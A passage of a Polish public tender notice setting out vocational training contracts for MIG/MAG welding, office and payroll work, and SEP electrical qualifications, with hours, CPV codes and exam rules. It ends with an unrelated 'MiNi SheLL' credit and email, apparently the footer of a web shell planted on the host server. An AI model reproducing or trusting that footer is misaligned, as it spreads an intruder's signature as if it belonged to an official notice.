W ramach szkolenia Wykonawca zorganizuje i przeprowadzi egzamin przed Komisją Urzędu Dozoru                          Technicznego. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Każdy uczestnik                    szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3. 5 SIWZ oraz zaświadczenie                    kwalifikacyjne wydane przez Urząd Dozoru Technicznego.
Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie                            z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakres II: Kurs spawania blach i rur  spoinami pachwinowymi w metodzie MIG i MAG
                  - 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 8  tygodni.
Program szkolenia: Program szkolenia powinien obejmować minimum 310 godzin, w tym 280 godzin zgodnie z programem szkolenia z zakresu spawania metodą MIG i MAG, w tym minimum 40 godzin teorii oraz minimum 240 godzin zajęć praktycznych oraz 30 godzin zajęć praktycznych na stanowisku pracy zorganizowanych u pracodawcy. Program szkolenia powinien zostać opracowany zgodnie                     z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz powinien uwzględniać przepisy Rozporządzenia Ministra Gospodarki z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470).
Dodatkowe wymagania: Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie 
z Rozdziałem 3 pkt 3.5 SIWZ, książkę spawacza oraz świadectwo egzaminu spawacza wydane przez Instytut Spawalnictwa w Gliwicach. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> zakres III: Pracownik biurowy z elementami kadr i płac - 8 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin- 200, w tym minimum  140 godzin ćwiczeń. 
1. Program szkolenia powinien być dostosowany do standardów kwalifikacji zawodowych dla zawodu : pracownik administracyjny (kod zawodu: 343101) i pracownik biurowy (kod zawodu:419101) oraz musi zawierać następujące jednostki modułowe:: 
1) organizowanie pracy własnej zgodnie z zasadami ergonomii, bezpieczeństwa i higieny pracy, 	ochrony przeciwpożarowej i ochrony środowiska oraz zarządzanie w jednostce organizacyjnej,
2) organizowanie pracy własnej na stanowisku technika administracji, usprawnianie pracy oraz 
    doskonalenie osobistych kompetencji,
3) organizowanie spotkań służbowych, z kontrahentami, pracownikami i klientami oraz innych prac 	związanych z funkcjonowaniem przedsiębiorstwa,
4) przyjmowanie i obsługiwanie interesantów,
5) wykonywanie prac administracyjnych związanych z ogólną działalnością jednostki organizacyjnej,
6) zapewnianie przepływu informacji i dokumentów wewnątrz i na zewnątrz organizacji,
7) sporządzanie dokumentacji prawnej oraz dokumentacji spraw pracowniczych związanej 
			z działalnością jednostki organizacyjnej,
8) przygotowywanie i udostępnianie dokumentacji do kontroli,
9) redagowanie korespondencji biurowej w języku polskim,
10) sporządzanie umów, dokumentacji spraw kancelaryjno - biurowych, pracowniczej oraz 
	finansowej związanej z działalnością jednostki gospodarczej,
11) przechowywanie i archiwizowanie informacji, dokumentów oraz akt spraw,
12)gromadzenie i wykorzystywanie informacji ekonomicznych i statystycznych w pracy pracownika                              	administracyjnego,
13) tworzenie i prowadzenie bazy danych kontrahentów,
14) stosowanie przepisów prawa w pracy zawodowej,
15) wykonywanie prac biurowych,
16) współpraca z innymi komórkami organizacyjnymi jednostki,
17) współpraca z otoczeniem zewnętrznym jednostki organizacyjnej,
18) kierowanie zespołem pracowników administracyjno - biurowych,
19) ocenianie jakości i efektywności własnych działań zawodowych,
20) obsługa komputera (edytor tekstów, arkusz kalkulacyjny, bazy danych, program do prezentacji                                    		multimedialnych, poczta elektroniczna, Internet),
21) obsługa urządzeń biurowych
2. zgodnie z modułowym programem szkolenia zawodowego dla zawodu: księgowy, z zakresu: 
	księgowy ds. płac i rozliczeń z ZUS (kod zawodu: 343201):  
1) wynagrodzenie za pracę - minimum 6 godzin  zawierająca następujące jednostki szkoleniowe
płaca - jej funkcje i zasady
 elementy i składniki wynagrodzenia za pracę 
minimalne wynagrodzenie za pracę
systemy wynagrodzenia za pracę 
wzorcowa lista płac  :; 
2) ochrona wynagrodzenia za pracę i obowiązki pracodawców - minimum 6 godzin  zawierająca na	stępujące jednostki szkoleniowe
prawo do wynagrodzenia
ochrona wynagrodzenia za pracę
potrącenia z wynagrodzenia za pracę
wgląd do dokumentacji płacowej
rozliczenia publicznoprawne
odpowiedzialność pracodawcy przy wypłacie wynagrodzeń
3) rozliczenie składek ZUS - minimum 6 godzin  zawierająca następujące jednostki szkoleniowe
zasady i tryb postępowania w sprawach rozliczenia składek 
dokumenty zgłoszeniowe, rozliczeniowe i płatnicze
wypełnianie i przekazywanie dokumentów ubezpieczeniowych 
4) zasiłki z ubezpieczenia społecznego - minimum 6 godziny zawierająca następujące jednostki 	szkoleniowe
zasiłek chorobowy i opiekuńczy 
świadczenia rehabilitacyjne 
zasiłek macierzyński 
zasiłki rodzinne, pielęgnacyjne i wychowawcze 
5) kompletowanie wniosków o emerytury i renty oraz ustalenie kapitału początkowego - minimum
	6 godzin zawierająca następujące jednostki szkoleniowe
kapitał początkowy - jego istota i zadania 
wniosek ZUS do pracodawców w sprawie kapitału początkowego 
kompletowanie dokumentów do wniosku o ustalenie kapitału początkowego 
ustalenie kapitału początkowego 
3.  jednostkę modułową: zagadnienia z zakresu kadr, w tym elementy związane z prawem pracy- mini	mum 20 godzin;
4.   jednostkę modułową: obsługa programu PŁATNIK- minimum 15 godzin;
5.   jednostkę modułową: obsługa programu SYMFONIA w zakresie kadr i płac - minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę z zakresu prac biurowych oraz kadr i płac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zakres IV: Uprawnienia SEP do 1 kV - 5 osób w I edycji..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 2 tygodnie.
Program szkolenia: minimalna ilość godzin- 60. Program szkolenia musi być zgodny z przepisami
rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją 
urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 z późn. zm.) i obwieszczenia Prezesa Rady Ministrów z dnia 02 lipca 2003r. o sprostowaniu błędów (Dz. U. Nr 129, poz. 1184) oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych
zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci ( Dz. U. Nr 141, poz. 1189) oraz zawierać m.in.:
1) zasady budowy, działania oraz warunków technicznych obsługi urządzeń, instalacji i sieci,
2) zasady eksploatacji oraz instrukcji eksploatacji urządzeń, instalacji i sieci,
3) zasady i warunki wykonywania prac kontrolno - pomiarowych i montażowych,
4) zasady i wymagania bezpieczeństwa pracy i ochrony przeciwpożarowej oraz umiejętności 	udzielania pierwszej pomocy,
5) instrukcję postępowania w razie awarii, pożaru lub innego zagrożenia bezpieczeństwa obsługi urządzeń lub zagrożenia życia, zdrowia i środowiska.
Dodatkowe wymagania: Szkolenie powinno zakończyć się egzaminem zewnętrznym przed Komisją powołaną przez Urząd Regulacji Energetyki. Każdy uczestnik szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3.5 SIWZ oraz świadectwo kwalifikacyjne w grupie materiałowej G-1E zgodnie z wzorem świadectwa kwalifikacyjnego, stanowiącym załącznik do rozporządzenia Ministra Gospodarki i Pracy z dnia 20 lipca 2005r. zmieniającego rozporządzenie w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń instalacji i sieci (Dz. U. Nr 141 poz. 1189). Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com